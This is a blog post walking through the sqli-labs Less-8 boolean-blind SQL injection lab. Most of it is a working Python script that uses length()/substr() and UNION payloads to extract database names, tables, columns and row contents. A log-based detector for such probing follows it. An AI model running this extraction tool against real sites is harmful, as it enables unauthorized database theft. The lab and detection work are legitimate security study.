sqli-labs Less-8: boolean-based blind injection


Published 24 July 2023 (author: )

This is a boolean-based blind injection challenge. Time-based blind injection would also work here, but this post covers the boolean approach. Boolean blind injection mainly relies on the following MySQL functions:

- length(): returns the length of a string
- substr(): extracts a substring
- ascii(): returns the ASCII code of a character
- sleep(n): suspends execution for n seconds
- if(expr1, expr2, expr3): a conditional; if the first expression is true the second is evaluated, otherwise the third

I won't walk through the exact procedure here, because it is very easy to pick up; it is just hard on the hands, so it is best not to inject manually. You can use Burp Suite to drive the injection, or let sqlmap dump everything directly (sqlmap, GOAT forever). Still, it is better to learn to write your own tooling: write a tool for each technique as you learn it, and over time that accumulates into something equivalent to your own sqlmap.

Here is the boolean injection script I wrote. It is very crude and does not use binary search (don't ask; I just haven't learned binary search properly...). I'll switch it to binary search later to improve efficiency.

```python
import requests


def database_len(url, param1, param2, cont):
    # url = '''/Less-8/'''
    # Try candidate lengths 1..9; the page contains `cont` only when the condition is true
    for i in range(1, 10):
        payload = ''' and length(database())=%d -- -''' % i
        r = requests.get(url + param1 + payload)
        if cont in r.text:
            print('database_length:', i)
            return i


def database_name(url, param1, param2, cont, db_len):
    database_name = ''
    # url = '''/Less-8/'''
    for i in range(1, db_len + 1):
        for j in 'abcdefghijklmnopqrstuvwxyz':
            payload = ''' and substr(database(),%d,1)='%s' -- -''' % (i, j)
            r = requests.get(url + param1 + payload)
            if cont in r.text:
                database_name += j
                break
    print('database_name:', database_name)
    return database_name


def table_number(url, param1, param2, cont, db_name):
    # url = '''/Less-8/'''
    # param2 is the non-echoing (false) branch, so `cont` appears only via the UNION row
    i = 0
    while 1:
        payload = ''' union select 1,2,table_name from information_schema.tables where table_schema='%s' limit %d,1 -- -''' % (db_name, i)
        r = requests.get(url + param2 + payload)
        if cont in r.text:
            i = i + 1
        else:
            break
    print('table_number:', i)
    return i


def table_len(url, param1, param2, cont, i, db_name):
    # url = '''/Less-8/'''
    for length in range(1, 10):
        payload = ''' and length((select table_name from information_schema.tables where table_schema='%s' limit %d,1))=%d -- -''' % (db_name, i, length)
        r = requests.get(url + param1 + payload)
        if cont in r.text:
            return length


def table_name(url, param1, param2, cont, table_number, db_name):
    # url = '''/Less-8/'''
    table_names = []
    for i in range(0, table_number):
        length = table_len(url, param1, param2, cont, i, db_name)
        table_name = ''
        for j in range(1, length + 1):  # substr() positions are 1-based
            for k in 'abcdefghijklmnopqrstuvwxyz':
                payload = ''' and substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1)='%s' -- -''' % (db_name, i, j, k)
                r = requests.get(url + param1 + payload)
                if cont in r.text:
                    table_name += k
                    break
        table_names.append(table_name)
    return table_names


def column_number(url, param1, param2, cont, table_name):
    # url = '''/Less-8/'''
    i = 0
    while 1:
        payload = ''' union select 1,2,column_name from information_schema.columns where table_name='%s' limit %d,1 -- -''' % (table_name, i)
        r = requests.get(url + param2 + payload)
        if cont in r.text:
            i = i + 1
        else:
            break
    print('%s表中列的数量:' % table_name, i)  # number of columns in the table
    return i


def column_len(url, param1, param2, cont, j, table_name):
    # url = '''/Less-8/'''
    for length in range(1, 25):
        payload = ''' and length((select column_name from information_schema.columns where table_name='%s' limit %d,1))=%d -- -''' % (table_name, j, length)
        r = requests.get(url + param1 + payload)
        if cont in r.text:
            return length


def column_name(url, param1, param2, cont, table_names):
    # url = '''/Less-8/'''
    # column_names = []
    for table_name in table_names:
        column_num = column_number(url, param1, param2, cont, table_name)
        for j in range(0, column_num):
            column_name = ''
            length = column_len(url, param1, param2, cont, j, table_name)
            # print('%s的第%d个列的长度为:%d' % (table_name, j + 1, length))
            for v in range(1, length + 1):
                for k in 'abcdefghijklmnopqrstuvwxyz':
                    payload = ''' and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s' -- -''' % (table_name, j, v, k)
                    r = requests.get(url + param1 + payload)
                    if cont in r.text:
                        column_name += k
                        break
            print('%s的第%d个列的名字是:%s' % (table_name, j + 1, column_name))  # name of column j+1
        print()


def content_number(url, param1, param2, cont, table_n, column_n):
    # url = '''/Less-8/'''
    i = 0
    while 1:
        payload = ''' union select 1,2,%s from %s limit %d,1 -- -''' % (column_n, table_n, i)
        r = requests.get(url + param2 + payload)
        if cont in r.text:
            i = i + 1
        else:
            break
    return i


def content_len(url, param1, param2, cont, table_n, column_n, i):
    # url = '''/Less-8/'''
    for length in range(1, 25):
        payload = ''' and length((select %s from %s limit %d,1))=%d -- -''' % (column_n, table_n, i, length)
        r = requests.get(url + param1 + payload)
        if cont in r.text:
            return length


def content(url, param1, param2, cont, table_n, column_n):
    # url = '''/Less-8/'''
    number = content_number(url, param1, param2, cont, table_n, column_n)
    for i in range(0, number):
        content = ''
        length = content_len(url, param1, param2, cont, table_n, column_n, i)
        for j in range(1, length + 1):
            for k in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ':
                payload = ''' and substr((select %s from %s limit %d,1),%d,1)='%s' -- -''' % (column_n, table_n, i, j, k)
                r = requests.get(url + param1 + payload)
                if cont in r.text:
                    content += k
                    break
        print(content)


# Prompts: target URL (e.g. /Less-8/), the already-closed parameter that echoes a row
# (e.g. ?id=1'), the already-closed parameter that echoes nothing (e.g. ?id=0'),
# and the text that marks the "true" page.
url = input("请输入要注入的网址,例如/Less-8/ :")
param1 = input("请输入要注入的已经闭合了的参数且可回显的,例如 ?id=1' :")
param2 = input("请输入要注入的已经闭合了的参数且不可回显的,例如 ?id=0' :")
cont = input("请输入布尔回显:")
db_len = database_len(url, param1, param2, cont)
print()
db_name = database_name(url, param1, param2, cont, db_len)
print()
tbl_count = table_number(url, param1, param2, cont, db_name)
print()
table_names = table_name(url, param1, param2, cont, tbl_count, db_name)
print('%s的表如下:' % db_name)  # tables in the database
for i in table_names:
    print(i)
print()
column_name(url, param1, param2, cont, table_names)
print()
# Read the contents of the requested columns; entering "I want to leave" exits
while 1:
    table_n = input('请输入您要读取的表名,如果输入I want to leave,那么程序就会退出:')
    if table_n == 'I want to leave':
        break
    column_n = input('请输入您要读取的列名,如果输入I want to leave,那么程序就会退出:')
    if column_n == 'I want to leave':
        break
    print()
    content(url, param1, param2, cont, table_n, column_n)
    print()
```

Since I have only been learning Python for about two days, it is written terribly... (go easy on me, masters).
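Seen from the server side, a script like the one above leaves a recognisable footprint: one request per probed length or character, each carrying length()/substr() (or ascii(), if(), sleep(), information_schema) in the same parameter. As an added example that is not part of the original post, the following parses constructed access-log lines in combined log format (IPs, timestamps, user agents and the alert threshold are made up) and flags clients that repeatedly send such payloads to one parameter.

```python
"""Flag boolean-blind SQL injection probing in access logs (added example, not from
the post). Blind scripts send one request per probed length or character, each with
length()/substr()/ascii()/if()/sleep() or information_schema in a parameter value."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# SQL functions and objects the post relies on for blind injection.
BLIND_MARKER = re.compile(
    r"\b(length|substr|substring|ascii|sleep|if)\s*\(|information_schema", re.I)
# Combined log format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_request(line):
    """Return (client_ip, path, [(param, decoded_value), ...]) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("path"))
    # parse_qsl percent-decodes, so "1%27%20and%20length(" becomes "1' and length("
    return m.group("ip"), parts.path, parse_qsl(parts.query, keep_blank_values=True)

def suspicious_params(params):
    """Names of query parameters whose decoded value carries a blind-injection marker."""
    return [name for name, value in params if BLIND_MARKER.search(value)]

def detect(lines, threshold=5):
    """Count marker-bearing requests per (ip, path, param); keep those at/above threshold."""
    hits = Counter()
    for line in lines:
        parsed = parse_request(line)
        if parsed is None:
            continue
        ip, path, params = parsed
        for name in suspicious_params(params):
            hits[(ip, path, name)] += 1
    return {key: n for key, n in hits.items() if n >= threshold}

# Constructed sample traffic (not real logs): eight length() probes shaped like the
# post's database_len() requests, plus two ordinary requests from another client.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jul/2023:10:00:%02d +0800] "GET /Less-8/?id=1%%27%%20and%%20length(database())=%d%%20--%%20- HTTP/1.1" 200 712 "-" "python-requests/2.31.0"'
    % (i, i) for i in range(1, 9)
] + [
    '10.0.0.7 - - [24/Jul/2023:10:01:00 +0800] "GET /Less-8/?id=1 HTTP/1.1" 200 712 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [24/Jul/2023:10:01:02 +0800] "GET /Less-8/?id=2 HTTP/1.1" 200 710 "-" "Mozilla/5.0"',
]
```

Running `detect(SAMPLE_LOG)` returns the single key `('10.0.0.5', '/Less-8/', 'id')` with a count of 8, while the ordinary client produces no entry; a single-quote-only probe (`?id=1'`) carries no marker and is deliberately not counted, so the threshold should be paired with error-rate monitoring.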

Publisher: admin. When reposting, please credit the source: http://www.yc00.com/web/1690193343a312428.html
